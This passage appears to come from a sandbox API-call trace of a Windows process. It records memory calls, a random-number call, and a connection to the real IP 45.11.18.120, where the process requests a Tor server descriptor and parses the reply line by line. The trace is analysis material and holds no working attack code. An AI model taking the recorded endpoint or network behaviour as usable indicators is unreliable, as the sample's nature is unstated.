returned 0x3df00e0 [0135.768] free (_Block=0x3d80eb8) [0135.768] malloc (_Size=0x1550) returned 0x3f68010 [0135.768] free (_Block=0x3df00e0) [0135.768] malloc (_Size=0x5550) returned 0x348c1b8 [0135.769] free (_Block=0x3f68010) [0135.769] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x4, pbBuffer=0x339fa84 | out: pbBuffer=0x339fa84) returned 1 [0135.769] free (_Block=0x348c1b8) [0135.769] free (_Block=0x0) [0135.769] free (_Block=0x0) [0135.769] free (_Block=0x3f4c038) [0135.769] inet_ntoa (in=0x78120b2d) returned="45.11.18.120" [0135.769] malloc (_Size=0xd) returned 0x3648c80 [0135.769] free (_Block=0x0) [0135.769] gethostbyname (name="45.11.18.120") returned 0x42b838*(h_name="45.11.18.120", h_aliases=0x42b848*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x42b84c*=([0]="45.11.18.120")) [0135.769] htons (hostshort=0x50) returned 0x5000 [0135.769] socket (af=2, type=1, protocol=6) returned 0x5c8 [0135.770] connect (s=0x5c8, name=0x339fa60*(sa_family=2, sin_port=0x50, sin_addr="45.11.18.120"), namelen=16) returned 0 [0135.794] _vscprintf (_Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x339fa28) returned 92 [0135.794] malloc (_Size=0x5d) returned 0x60e630 [0135.795] free (_Block=0x0) [0135.795] vsprintf_s (in: _DstBuf=0x60e630, _SizeInBytes=0x5d, _Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x339fa28 | out: _DstBuf="GET /tor/server/fp/8a63e4cc86e4aff54e07af9d2340dfdfb8674312 HTTP/1.0\r\nHost: 45.11.18.120\r\n\r\n") returned 92 [0135.795] send (s=0x5c8, buf=0x60e630*, len=93, flags=0) returned 93 [0135.796] recv (in: s=0x5c8, buf=0x339ea24, len=4096, flags=0 | out: buf=0x339ea24*) returned 4096 [0135.844] malloc (_Size=0x1001) returned 0x3f68010 [0135.844] free (_Block=0x0) [0135.844] recv (in: s=0x5c8, buf=0x339ea24, len=4096, flags=0 | out: buf=0x339ea24*) returned 3061 [0135.844] malloc (_Size=0x1bf6) returned 0x3f69020 [0135.844] free (_Block=0x3f68010) [0135.844] recv (in: s=0x5c8, buf=0x339ea24, len=4096, flags=0 | out: buf=0x339ea24) returned 0 [0135.844] closesocket (s=0x5c8) returned 0 [0135.845] malloc (_Size=0x1b3f) returned 0x3691270 [0135.845] free (_Block=0x0) [0135.845] free (_Block=0x3f69020) [0135.845] free (_Block=0x60e630) [0135.845] closesocket (s=0xffffffff) returned -1 [0135.846] free (_Block=0x0) [0135.846] free (_Block=0x3648c80) [0135.846] free (_Block=0x0) [0135.846] free (_Block=0x3624670) [0135.846] free (_Block=0x3648ec0) [0135.846] free (_Block=0x3624ad8) [0135.846] malloc (_Size=0x1b3f) returned 0x3692db8 [0135.846] free (_Block=0x0) [0135.846] malloc (_Size=0x2a) returned 0x36249f8 [0135.846] free (_Block=0x0) [0135.846] malloc (_Size=0x40) returned 0x3e226f8 [0135.846] free (_Block=0x0) [0135.846] free (_Block=0x0) [0135.846] memchr (_Buf=0x3692de2, _Val=10, _MaxCount=0x1b14) returned 0x3692df2 [0135.846] malloc (_Size=0x11) returned 0x3f65140 [0135.846] free (_Block=0x0) [0135.846] free (_Block=0x0) [0135.846] memchr (_Buf=0x3692df3, _Val=10, _MaxCount=0x1b03) returned 0x3692e0f [0135.846] malloc (_Size=0x1d) returned 0x3d80198 [0135.846] free (_Block=0x0) [0135.847] free (_Block=0x0) [0135.847] memchr (_Buf=0x3692e10, _Val=10, _MaxCount=0x1ae6) returned 0x3692e50 [0135.847] malloc (_Size=0x41) returned 0x3def9a0 [0135.847] free (_Block=0x0) [0135.847] free (_Block=0x0) [0135.847] memchr (_Buf=0x3692e51, _Val=10, _MaxCount=0x1aa5) returned 0x3692e91 [0135.847] malloc (_Size=0x41) returned 0x3defb80 [0135.847] free (_Block=0x0) [0135.847] malloc (_Size=0x140) returned 0x3dd4a20 [0135.847] free (_Block=0x3e226f8) [0135.847] free (_Block=0x0) [0135.847] memchr (_Buf=0x3692e92, _Val=10, _MaxCount=0x1a64) returned 0x3692ece [0135.847] malloc (_Size=0x3d) returned 0x3e22038 [0135.847] free (_Block=0x0) [0135.847] free (_Block=0x0) [0135.847] memchr (_Buf=0x3692ecf, _Val=10, _MaxCount=0x1a27) returned 0x3692ee9 [0135.847] malloc (_Size=0x1b) returned 0x3d801e8 [0135.847] free (_Block=0x0) [0135.847] free (_Block=0x0) [0135.847] memchr (_Buf=0x3692eea, _Val=10, _MaxCount=0x1a0c) returned 0x3692f28 [0135.847] malloc (_Size=0x3f) returned 0x3e227d0 [0135.847] free (_Block=0x0) [0135.847] free (_Block=0x0) [0135.847] memchr (_Buf=0x3692f29, _Val=10, _MaxCount=0x19cd) returned 0x3692f49 [0135.848] malloc (_Size=0x21) returned 0x60de58 [0135.848] free (_Block=0x0) [0135.848] free (_Block=0x0) [0135.848] memchr (_Buf=0x3692f4a, _Val=10, _MaxCount=0x19ac) returned 0x3692f67 [0135.848] malloc (_Size=0x1e) returned 0x3d80238 [0135.848] free (_Block=0x0) [0135.848] free (_Block=0x0) [0135.848] memchr (_Buf=0x3692f68, _Val=10, _MaxCount=0x198e) returned 0x3692ff0 [0135.848] malloc (_Size=0x89) returned 0x6066d8 [0135.848] free (_Block=0x0) [0135.848] free (_Block=0x0) [0135.848] memchr (_Buf=0x3692ff1, _Val=10, _MaxCount=0x1905) returned 0x369300e [0135.848] malloc (_Size=0x1e) returned 0x3d803c8 [0135.848] free (_Block=0x0) [0135.848] free (_Block=0x0) [0135.848] memchr (_Buf=0x369300f, _Val=10, _MaxCount=0x18e7) returned 0x369304c [0135.848] malloc (_Size=0x3e) returned 0x3e22278 [0135.848] free (_Block=0x0) [0135.848] free (_Block=0x0) [0135.848] memchr (_Buf=0x369304d, _Val=10, _MaxCount=0x18a9) returned 0x369305a [0135.848] malloc (_Size=0xe) returned 0x3648ce0 [0135.848] free (_Block=0x0) [0135.849] free (_Block=0x0) [0135.849] memchr (_Buf=0x369305b, _Val=10, _MaxCount=0x189b) returned 0x3693082 [0135.849] malloc (_Size=0x28) returned 0x60de28 [0135.849] free (_Block=0x0) [0135.849] free (_Block=0x0) [0135.849] memchr (_Buf=0x3693083, _Val=10, _MaxCount=0x1873) returned 0x36930e9 [0135.849] malloc (_Size=0x67) returned 0x60b1c0 [0135.849] free (_Block=0x0) [0135.849] free (_Block=0x0) [0135.849] memchr (_Buf=0x36930ea, _Val=10, _MaxCount=0x180c) returned 0x36930f3 [0135.849] malloc (_Size=0xa) returned 0x3648cf8 [0135.849] free (_Block=0x0) [0135.849] free (_Block=0x0) [0135.849] memchr (_Buf=0x36930f4, _Val=10, _MaxCount=0x1802) returned 0x3693112 [0135.849] malloc (_Size=0x1f) returned 0x3d80080 [0135.849] free (_Block=0x0) [0135.849] free (_Block=0x0) [0135.849] memchr (_Buf=0x3693113, _Val=10, _MaxCount=0x17e3) returned 0x3693153 [0135.849] malloc (_Size=0x41) returned 0x3defd10 [0135.849] free (_Block=0x0) [0135.849] free (_Block=0x0) [0135.850] memchr (_Buf=0x3693154, _Val=10, _MaxCount=0x17a2) returned 0x3693194 [0135.851] malloc (_Size=0x41) returned 0x3df0080 [0135.851] free (_Block=0x0) [0135.851] free (_Block=0x0) [0135.851] memchr (_Buf=0x3693195, _Val=10, _MaxCount=0x1761) returned 0x36931d1 [0135.851] malloc (_Size=0x3d) returned 0x3e22788 [0135.851] free (_Block=0x0) [0135.851] malloc (_Size=0x540) returned 0x3df00e0 [0135.851] free (_Block=0x3dd4a20) [0135.851] free (_Block=0x0) [0135.851] memchr (_Buf=0x36931d2, _Val=10, _MaxCount=0x1724) returned 0x36931ee [0135.851] malloc (_Size=0x1d) returned 0x3d80328 [0135.851] free (_Block=0x0) [0135.851] free (_Block=0x0) [0135.851] memchr (_Buf=0x36931ef, _Val=10, _MaxCount=0x1707) returned 0x36931fa [0135.851] malloc (_Size=0xc) returned 0x3648e18 [0135.851] free (_Block=0x0) [0135.851] free (_Block=0x0) [0135.851] memchr (_Buf=0x36931fb, _Val=10, _MaxCount=0x16fb) returned 0x3693219 [0135.851] malloc (_Size=0x1f) returned 0x3d80210 [0135.852] free (_Block=0x0) [0135.852] free (_Block=0x0) [0135.852] memchr (_Buf=0x369321a, _Val=10, _MaxCount=0x16dc) returned 0x369325a [0135.852] malloc (_Size=0x41) returned 0x3deffe0 [0135.852] free (_Block=0x0) [0135.852] free (_Block=0x0) [0135.852] memchr (_Buf=0x369325b, _Val=10, _MaxCount=0x169b) returned 0x369329b [0135.852] malloc (_Size=0x41) returned 0x3defcc0 [0135.852] free (_Block=0x0) [0135.852] free (_Block=0x0) [0135.852] memchr (_Buf=0x369329c, _Val=10, _MaxCount=0x165a) returned 0x36932d8 [0135.852] malloc (_Size=0x3d) returned 0x3e222c0 [0135.852] free (_Block=0x0) [0135.852] free (_Block=0x0) [0135.852] memchr (_Buf=0x36932d9, _Val=10, _MaxCount=0x161d) returned 0x36932f5 [0135.852] malloc (_Size=0x1d) returned 0x3d803f0 [0135.852] free (_Block=0x0) [0135.852] free (_Block=0x0) [0135.852] memchr (_Buf=0x36932f6, _Val=10, _MaxCount=0x1600) returned 0x3693309 [0135.852] malloc (_Size=0x14) returned 0x3f65300 [0135.852] free (_Block=0x0) [0135.852] free (_Block=0x0) [0135.853] memchr (_Buf=0x369330a, _Val=10, _MaxCount=0x15ec) returned 0x3693323 [0135.853] malloc (_Size=0x1a) returned 0x3d802d8 [0135.853] free (_Block=0x0) [0135.853] free (_Block=0x0) [0135.853] memchr (_Buf=0x3693324, _Val=10, _MaxCount=0x15d2) returned 0x3693364 [0135.853] malloc (_Size=0x41) returned 0x3deff40 [0135.853] free (_Block=0x0) [0135.853] free (_Block=0x0) [0135.853] memchr (_Buf=0x3693365, _Val=10, _MaxCount=0x1591) returned 0x36933a5 [0135.853] malloc (_Size=0x41) returned 0x3defbd0 [0135.853] free (_Block=0x0) [0135.853] free (_Block=0x0) [0135.853] memchr (_Buf=0x36933a6, _Val=10, _MaxCount=0x1550) returned 0x36933d2 [0135.853] malloc (_Size=0x2d) returned 0x3624b10 [0135.853] free (_Block=0x0) [0135.853] free (_Block=0x0) [0135.853] memchr (_Buf=0x36933d3, _Val=10, _MaxCount=0x1523) returned 0x36933ea [0135.853] malloc (_Size=0x18) returned 0x3f65280 [0135.853] free (_Block=0x0) [0135.853] free (_Block=0x0) [0135.854] memchr (_Buf=0x36933eb, _Val=10, _MaxCount=0x150b) returned 0x3693405 [0135.854] malloc (_Size=0x1b) returned 0x3d80300 [0135.854] free (_Block=0x0) [0135.854] free (_Block=0x0) [0135.854] memchr (_Buf=0x3693406, _Val=10, _MaxCount=0x14f0) returned 0x3693422 [0135.854] malloc (_Size=0x1d) returned 0x3d80260 [0135.854] free (_Block=0x0) [0135.854] free (_Block=0x0) [0135.854] memchr (_Buf=0x3693423, _Val=10, _MaxCount=0x14d3) returned 0x3693463 [0135.854] malloc (_Size=0x41) returned 0x3defae0 [0135.854] free (_Block=0x0) [0135.854] free (_Block=0x0) [0135.854] memchr (_Buf=0x3693464, _Val=10, _MaxCount=0x1492) returned 0x36934a4 [0135.854] malloc (_Size=0x41) returned 0x3def950 [0135.854] free (_Block=0x0) [0135.854] free (_Block=0x0) [0135.854] memchr (_Buf=0x36934a5, _Val=10, _MaxCount=0x1451) returned 0x36934b1 [0135.854] malloc (_Size=0xd) returned 0x3648e90 [0135.854] free (_Block=0x0) [0135.854] free (_Block=0x0) [0135.854] memchr (_Buf=0x36934b2, _Val=10, _MaxCount=0x1444) returned 0x36934cc [0135.854] malloc (_Size=0x1b) returned 0x3d800a8 [0135.855] free (_Block=0x0) [0135.855] free (_Block=0x0) [0135.855] memchr (_Buf=0x36934cd, _Val=10, _MaxCount=0x1429) returned 0x369453b [0135.855] malloc (_Size=0x106f) returned 0x3f68010 [0135.855] free (_Block=0x0) [0135.855] free (_Block=0x0) [0135.855] memchr (_Buf=0x369453c, _Val=10, _MaxCount=0x3ba) returned 0x369454e [0135.855] malloc (_Size=0x13) returned 0x3f65440 [0135.855] free (_Block=0x0) [0135.855] free (_Block=0x0) [0135.855] memchr (_Buf=0x369454f, _Val=10, _MaxCount=0x3a7) returned 0x3694586 [0135.855] malloc (_Size=0x38) returned 0x36242f0 [0135.855] free (_Block=0x0) [0135.855] free (_Block=0x0) [0135.855] memchr (_Buf=0x3694587, _Val=10, _MaxCount=0x36f) returned 0x36945c2 [0135.855] malloc (_Size=0x3c) returned 0x3e22740 [0135.855] free (_Block=0x0) [0135.855] free (_Block=0x0) [0135.855] memchr (_Buf=0x36945c3, _Val=10, _MaxCount=0x333) returned 0x36945d5 [0135.855] malloc (_Size=0x13) returned 0x3f65460 [0135.855] free (_Block=0x0) [0135.856] free (_Block=0x0) [0135.856] memchr (_Buf=0x36945d6, _Val=10, _MaxCount=0x320) returned 0x36945ed [0135.856] malloc (_Size=0x18) returned 0x3f65320 [0135.856] free (_Block=0x0) [0135.856] free (_Block=0x0) [0135.856] memchr (_Buf=0x36945ee, _Val=10, _MaxCount=0x308) returned 0x3694602 [0135.856] malloc (_Size=0x15) returned 0x3f65480 [0135.856] free (_Block=0x0) [0135.856] free (_Block=0x0) [0135.856] memchr (_Buf=0x3694603, _Val=10, _MaxCount=0x2f3) returned 0x369461a [0135.856] malloc (_Size=0x18) returned 0x3f65340 [0135.856] free (_Block=0x0) [0135.857] free (_Block=0x0) [0135.857] memchr (_Buf=0x369461b, _Val=10, _MaxCount=0x2db) returned 0x369462e [0135.857] malloc (_Size=0x14) returned 0x3f652c0 [0135.857] free (_Block=0x0) [0135.857] free (_Block=0x0) [0135.857] memchr (_Buf=0x369462f, _Val=10, _MaxCount=0x2c7) returned 0x3694645 [0135.857] malloc (_Size=0x17) returned 0x3f654c0 [0135.857] free (_Block=0x0) [0135.857] free (_Block=0x0) [0135.857] memchr (_Buf=0x3694646, _Val=10, _MaxCount=0x2b0) returned 0x369465e [0135.857] malloc (_Size=0x19) returned 0x3d801c0 [0135.857] free (_Block=0x0) [0135.857] free (_Block=0x0) [0135.857] memchr (_Buf=0x369465f, _Val=10, _MaxCount=0x297) returned 0x369466a [0135.857] malloc (_Size=0xc) returned 0x3648d10 [0135.857] free (_Block=0x0) [0135.857] free (_Block=0x0) [0135.857] memchr (_Buf=0x369466b, _Val=10, _MaxCount=0x28b) returned 0x3694676 [0135.857] malloc (_Size=0xc) returned 0x3648e30 [0135.857] free (_Block=0x0) [0135.858] free (_Block=0x0) [0135.858] memchr (_Buf=0x3694677, _Val=10, _MaxCount=0x27f) returned 0x3694682 [0135.858] malloc (_Size=0xc) returned 0x3648c80 [0135.858] free (_Block=0x0) [0135.858] free (_Block=0x0) [0135.858] memchr (_Buf=0x3694683, _Val=10, _MaxCount=0x273) returned 0x369468f [0135.858] malloc (_Size=0xd) returned 0x3648d58 [0135.858] free (_Block=0x0) [0135.858] free (_Block=0x0) [0135.858] memchr (_Buf=0x3694690, _Val=10, _MaxCount=0x266) returned 0x369469c [0135.858] malloc (_Size=0xd) returned 0x3648cb0 [0135.858] free (_Block=0x0) [0135.858] free (_Block=0x0) [0135.858] memchr (_Buf=0x369469d, _Val=10, _MaxCount=0x259) returned 0x36946aa [0135.858] malloc (_Size=0xe) returned 0x3648db8 [0135.858] free (_Block=0x0) [0135.858] free (_Block=0x0) [0135.858] memchr (_Buf=0x36946ab, _Val=10, _MaxCount=0x24b) returned 0x36946b8 [0135.859] malloc (_Size=0xe) returned 0x3648d28 [0135.859] free (_Block=0x0) [0135.859] free (_Block=0x0) [0135.859] memchr (_Buf=0x36946b9, _Val=10, _MaxCount=0x23d) returned 0x36946c6 [0135.859] malloc (_Size=0xe) returned 0x3648d40 [0135.859] free (_Block=0x0) [0135.859] free (_Block=0x0) [0135.859] memchr (_Buf=0x36946c7, _Val=10, _MaxCount=0x22f) returned 0x36946d4 [0135.859] malloc (_Size=0xe) returned 0x3648e78 [0135.859] free (_Block=0x0) [0135.860] free (_Block=0x0) [0135.860] memchr (_Buf=0x36946d5, _Val=10, _MaxCount=0x221) returned 0x36946e7 [0135.860] malloc (_Size=0x13) returned 0x3f65360 [0135.860] free (_Block=0x0) [0135.860] free (_Block=0x0) [0135.860] memchr (_Buf=0x36946e8, _Val=10, _MaxCount=0x20e) returned 0x36946f5 [0135.860] malloc (_Size=0xe) returned 0x3648e60 [0135.860] free (_Block=0x0) [0135.860] free (_Block=0x0) [0135.860] memchr (_Buf=0x36946f6, _Val=10, _MaxCount=0x200) returned 0x3694703 [0135.860] malloc (_Size=0xe) returned 0x3648c98 [0135.861] free (_Block=0x0) [0135.861] free (_Block=0x0) [0135.861] memchr (_Buf=0x3694704, _Val=10, _MaxCount=0x1f2) returned 0x3694712 [0135.861] malloc (_Size=0xf) returned 0x3648e48 [0135.861] free (_Block=0x0) [0135.861] free (_Block=0x0) [0135.861] memchr (_Buf=0x3694713, _Val=10, _MaxCount=0x1e3) returned 0x3694721 [0135.861] malloc (_Size=0xf) returned 0x3648c50 [0135.861] free (_Block=0x0) [0135.861] free (_Block=0x0) [0135.861] memchr (_Buf=0x3694722, _Val=10, _MaxCount=0x1d4) returned 0x369472c [0135.861] malloc (_Size=0xb) returned 0x3648d70 [0135.861] free (_Block=0x0) [0135.861] free (_Block=0x0) [0135.861] memchr (_Buf=0x369472d, _Val=10, _MaxCount=0x1c9) returned 0x3694784 [0135.861] malloc (_Size=0x58) returned 0x3df0628 [0135.861] free (_Block=0x0) [0135.861] free (_Block=0x0) [0135.861] memchr (_Buf=0x3694785, _Val=10, _MaxCount=0x171) returned 0x3694799 [0135.861] malloc (_Size=0x15) returned 0x3f651e0 [0135.861] free (_Block=0x0) [0135.861] free (_Block=0x0) [0135.861] memchr (_Buf=0x369479a, _Val=10, _MaxCount=0x15c) returned 0x3694803 [0135.862] malloc (_Size=0x6a) returned 0x60b650 [0135.862] free (_Block=0x0) [0135.862] free (_Block=0x0) [0135.862] memchr (_Buf=0x3694804, _Val=10, _MaxCount=0xf2) returned 0x3694814 [0135.862] malloc (_Size=0x11) returned 0x3f65380 [0135.862] free (_Block=0x0) [0135.862] free (_Block=0x0) [0135.862] memchr (_Buf=0x3694815, _Val=10, _MaxCount=0xe1) returned 0x369482e [0135.862] malloc (_Size=0x1a) returned 0x3d800d0 [0135.862] free (_Block=0x0) [0135.862] free (_Block=0x0) [0135.862] memchr (_Buf=0x369482f, _Val=10, _MaxCount=0xc7) returned 0x369486f [0135.862] malloc (_Size=0x41) returned 0x3def9f0 [0135.862] free (_Block=0x0) [0135.862] free (_Block=0x0) [0135.862] memchr (_Buf=0x3694870, _Val=10, _MaxCount=0x86) returned 0x36948b0 [0135.862] malloc (_Size=0x41) returned 0x3defc20 [0135.862] free (_Block=0x0) [0135.862] free (_Block=0x0) [0135.862] memchr (_Buf=0x36948b1, _Val=10, _MaxCount=0x45) returned 0x36948dd [0135.862] malloc (_Size=0x2d) returned 0x3624b80 [0135.863] free (_Block=0x0) [0135.863] free (_Block=0x0) [0135.863] memchr (_Buf=0x36948de, _Val=10, _MaxCount=0x18) returned 0x36948f5 [0135.863] malloc (_Size=0x18) returned 0x3f653c0 [0135.863] free (_Block=0x0) [0135.863] free (_Block=0x0) [0135.863] free (_Block=0x3692db8) [0135.863] memchr (_Buf=0x36249f8, _Val=32, _MaxCount=0x29) returned 0x36249fe [0135.863] malloc (_Size=0x7) returned 0x3f4bf38 [0135.863] free (_Block=0x0) [0135.863] malloc (_Size=0x40) returned 0x3e22500 [0135.863] free (_Block=0x0) [0135.863] free (_Block=0x0) [0135.863] memchr (_Buf=0x36249ff, _Val=32, _MaxCount=0x22) returned 0x3624a08 [0135.863] malloc (_Size=0xa) returned 0x3648e00 [0135.863] free (_Block=0x0) [0135.863] free (_Block=0x0) [0135.863] memchr (_Buf=0x3624a09, _Val=32, _MaxCount=0x18) returned 0x3624a18 [0135.863] malloc (_Size=0x10) returned 0x3648cc8 [0135.863] free (_Block=0x0) [0135.863] free (_Block=0x0) [0135.863] memchr (_Buf=0x3624a19, _Val=32, _MaxCount=0x8) returned 0x3624a1c [0135.863] malloc (_Size=0x4) returned 0x3f4c058 [0135.864] free (_Block=0x0) [0135.864] free (_Block=0x0) [0135.864] memchr (_Buf=0x3624a1d, _Val=32, _MaxCount=0x4) returned 0x3624a1e [0135.864] malloc (_Size=0x2) returned 0x3f4c0d8 [0135.864] free (_Block=0x0) [0135.864] malloc (_Size=0x140) returned 0x3dd3d50 [0135.864] free (_Block=0x3e22500) [0135.864] free (_Block=0x0) [0135.864] memchr (_Buf=0x3624a1f, _Val=32, _MaxCount=0x2) returned 0x0 [0135.864] malloc (_Size=0x3) returned 0x3f4bfe8 [0135.864] free (_Block=0x0) [0135.864] free (_Block=0x0) [0135.864] free (_Block=0x3f4bf38) [0135.864] free (_Block=0x3648e00) [0135.864] free (_Block=0x3648cc8) [0135.864] free (_Block=0x3f4c058) [0135.864] free (_Block=0x3f4c0d8) [0135.864] free (_Block=0x3f4bfe8) [0135.864] free (_Block=0x3dd3d50) [0135.864] memchr (_Buf=0x3f65140, _Val=32, _MaxCount=0x10) returned 0x0 [0135.864] malloc (_Size=0x11) returned 0x3f653e0 [0135.864] free (_Block=0x0) [0135.864] malloc (_Size=0x40) returned 0x3e22230 [0135.864] free (_Block=0x0) [0135.865] free (_Block=0x0) [0135.865] free (_Block=0x3f653e0) [0135.865] free (_Block=0x3e22230) [0135.865] memchr (_Buf=0x3d80198, _Val=32, _MaxCount=0x1c) returned 0x3d801a2 [0135.865] malloc (_Size=0xb) returned 0x3648d88 [0135.865] free (_Block=0x0) [0135.865] malloc (_Size=0x40) returned 0x3e220c8 [0135.865] free (_Block=0x0) [0135.865] free (_Block=0x0) [0135.865] memchr (_Buf=0x3d801a3, _Val=32, _MaxCount=0x11) returned 0x3d801aa [0135.865] malloc (_Size=0x8) returned 0x3f4c008 [0135.865] free (_Block=0x0) [0135.865] free (_Block=0x0) [0135.865] memchr (_Buf=0x3d801ab, _Val=32, _MaxCount=0x9) returned 0x0 [0135.865] malloc (_Size=0xa) returned 0x3648cc8 [0135.865] free (_Block=0x0) [0135.865] free (_Block=0x0) [0135.865] free (_Block=0x3648d88) [0135.865] free (_Block=0x3f4c008) [0135.865] free (_Block=0x3648cc8) [0135.865] free (_Block=0x3e220c8) [0135.865] memchr (_Buf=0x3def9a0, _Val=32, _MaxCount=0x40) returned 0x0 [0135.865] malloc (_Size=0x41) returned 0x3defa40 [0135.866] free (_Block=0x0) [0135.866] malloc (_Size=0x40) returned 0x3e221e8 [0135.866] free (_Block=0x0) [0135.866] free (_Block=0x0) [0135.866] free (_Block=0x3defa40) [0135.866] free (_Block=0x3e221e8) [0135.866] memchr (_Buf=0x3defb80, _Val=32, _MaxCount=0x40) returned 0x0 [0135.866] malloc (_Size=0x41) returned 0x3defdb0 [0135.866] free (_Block=0x0) [0135.866] malloc (_Size=0x40) returned 0x3e226b0 [0135.866] free (_Block=0x0) [0135.866] free (_Block=0x0) [0135.866] free (_Block=0x3defdb0) [0135.866] free (_Block=0x3e226b0) [0135.866] memchr (_Buf=0x3e22038, _Val=32, _MaxCount=0x3c) returned 0x0 [0135.866] malloc (_Size=0x3d) returned 0x3e22230 [0135.866] free (_Block=0x0) [0135.866] malloc (_Size=0x40) returned 0x3e22620 [0135.866] free (_Block=0x0) [0135.866] free (_Block=0x0) [0135.866] free (_Block=0x3e22230) [0135.866] free (_Block=0x3e22620) [0135.866] memchr (_Buf=0x3d801e8, _Val=32, _MaxCount=0x1a) returned 0x3d801f0 [0135.866] malloc (_Size=0x9) returned 0x3648ea8 [0135.867] free (_Block=0x0) [0135.867] malloc (_Size=0x40) returned 0x3e223e0 [0135.867] free (_Block=0x0) [0135.867] free (_Block=0x0) [0135.867] memchr (_Buf=0x3d801f1, _Val=32, _MaxCount=0x11) returned 0x3d801f8 [0135.867] malloc (_Size=0x8) returned 0x3f4bfb8 [0135.867] free (_Block=0x0) [0135.867] free (_Block=0x0) [0135.867] memchr (_Buf=0x3d801f9, _Val=32, _MaxCount=0x9) returned 0x0 [0135.867] malloc (_Size=0xa) returned 0x3648f08 [0135.867] free (_Block=0x0) [0135.867] free (_Block=0x0) [0135.867] free (_Block=0x3648ea8) [0135.867] free (_Block=0x3f4bfb8) [0135.867] free (_Block=0x3648f08) [0135.867] free (_Block=0x3e223e0) [0135.867] memchr (_Buf=0x3e227d0, _Val=32, _MaxCount=0x3e) returned 0x3e227e2 [0135.867] malloc (_Size=0x13) returned 0x3f653e0 [0135.867] free (_Block=0x0) [0135.867] malloc (_Size=0x40) returned 0x3e22470 [0135.867] free (_Block=0x0) [0135.867] free (_Block=0x0) [0135.868] memchr (_Buf=0x3e227e3, _Val=32, _MaxCount=0x2b) returned 0x0 [0135.868] malloc (_Size=0x2c) returned 0x3624918 [0135.868] free (_Block=0x0) [0135.868] free (_Block=0x0) [0135.868] free (_Block=0x3f653e0) [0135.868] free (_Block=0x3624918) [0135.868] free (_Block=0x3e22470) [0135.868] memchr (_Buf=0x60de58, _Val=32, _MaxCount=0x20) returned 0x60de62 [0135.868] malloc (_Size=0xb) returned 0x3648d88 [0135.868] free (_Block=0x0) [0135.868] malloc (_Size=0x40) returned 0x3e22230 [0135.868] free (_Block=0x0) [0135.868] free (_Block=0x0) [0135.868] memchr (_Buf=0x60de63, _Val=32, _MaxCount=0x15) returned 0x0 [0135.868] malloc (_Size=0x16) returned 0x3f653e0 [0135.868] free (_Block=0x0) [0135.868] free (_Block=0x0) [0135.868] free (_Block=0x3648d88) [0135.868] free (_Block=0x3f653e0) [0135.868] free (_Block=0x3e22230) [0135.868] memchr (_Buf=0x3d80238, _Val=32, _MaxCount=0x1d) returned 0x3d80240 [0135.868] malloc (_Size=0x9) returned 0x3648d88 [0135.868] free (_Block=0x0) [0135.869] malloc (_Size=0x40) returned 0x3e22350 [0135.869] free (_Block=0x0) [0135.869] free (_Block=0x0) [0135.869] memchr (_Buf=0x3d80241, _Val=32, _MaxCount=0x14) returned 0x3d80244 [0135.869] malloc (_Size=0x4) returned 0x3f4c098 [0135.869] free (_Block=0x0) [0135.869] free (_Block=0x0) [0135.869] memchr (_Buf=0x3d80245, _Val=32, _MaxCount=0x10) returned 0x3d8024c [0135.869] malloc (_Size=0x8) returned 0x3f4bf18 [0135.869] free (_Block=0x0) [0135.869] free (_Block=0x0) [0135.869] memchr (_Buf=0x3d8024d, _Val=32, _MaxCount=0x8) returned 0x3d8024f [0135.869] malloc (_Size=0x3) returned 0x3f4c028 [0135.869] free (_Block=0x0) [0135.869] free (_Block=0x0) [0135.869] memchr (_Buf=0x3d80250, _Val=32, _MaxCount=0x5) returned 0x0 [0135.869] malloc (_Size=0x6) returned 0x3f4c078 [0135.869] free (_Block=0x0) [0135.869] malloc (_Size=0x140) returned 0x3dd4648 [0135.869] free (_Block=0x3e22350) [0135.869] free (_Block=0x0) [0135.870] free (_Block=0x3648d88) [0135.870] free (_Block=0x3f4c098) [0135.870] free (_Block=0x3f4bf18) [0135.870] free (_Block=0x3f4c028) [0135.870] free (_Block=0x3f4c078) [0135.870] free (_Block=0x3dd4648) [0135.870] memchr (_Buf=0x6066d8, _Val=32, _MaxCount=0x88) returned 0x6066dd [0135.870] malloc (_Size=0x6) returned 0x3f4bfa8 [0135.870] free (_Block=0x0) [0135.870] malloc (_Size=0x40) returned 0x3e22548 [0135.870] free (_Block=0x0) [0135.870] free (_Block=0x0) [0135.870] memchr (_Buf=0x6066de, _Val=32, _MaxCount=0x82) returned 0x6066e6 [0135.870] malloc (_Size=0x9) returned 0x3648de8 [0135.870] free (_Block=0x0) [0135.870] free (_Block=0x0) [0135.870] memchr (_Buf=0x6066e7, _Val=32, _MaxCount=0x79) returned 0x6066ef [0135.870] malloc (_Size=0x9) returned 0x3648f20 [0135.870] free (_Block=0x0) [0135.870] free (_Block=0x0) [0135.870] memchr (_Buf=0x6066f0, _Val=32, _MaxCount=0x70) returned 0x6066fc [0135.870] malloc (_Size=0xd) returned 0x3648c68 [0135.870] free (_Block=0x0) [0135.871] free (_Block=0x0) [0135.871] memchr (_Buf=0x6066fd, _Val=32, _MaxCount=0x63) returned 0x606707 [0135.871] malloc (_Size=0xb) returned 0x3648d88 [0135.871] free (_Block=0x0) [0135.871] malloc (_Size=0x140) returned 0x3dd4648 [0135.871] free (_Block=0x3e22548) [0135.871] free (_Block=0x0) [0135.871] memchr (_Buf=0x606708, _Val=32, _MaxCount=0x58) returned 0x606711 [0135.871] malloc (_Size=0xa) returned 0x3648da0 [0135.871] free (_Block=0x0) [0135.871] free (_Block=0x0) [0135.871] memchr (_Buf=0x606712, _Val=32, _MaxCount=0x4e) returned 0x60671d [0135.871] malloc (_Size=0xc) returned 0x3648e00 [0135.871] free (_Block=0x0) [0135.871] free (_Block=0x0) [0135.871] memchr (_Buf=0x60671e, _Val=32, _MaxCount=0x42) returned 0x606728 [0135.871] malloc (_Size=0xb) returned 0x3648ea8 [0135.871] free (_Block=0x0) [0135.871] free (_Block=0x0) [0135.871] memchr (_Buf=0x606729, _Val=32, _MaxCount=0x37) returned 0x606731 [0135.871] malloc (_Size=0x9) returned 0x3648cc8 [0135.871] free (_Block=0x0) [0135.871] free (_Block=0x0) [0135.872] memchr (_Buf=0x606732, _Val=32, _MaxCount=0x2e) returned 0x60673e [0135.872] malloc (_Size=0xd) returned 0x3648ec0 [0135.872] free (_Block=0x0) [0135.872] free (_Block=0x0) [0135.872] memchr (_Buf=0x60673f, _Val=32, _MaxCount=0x21) returned 0x60674c [0135.872] malloc 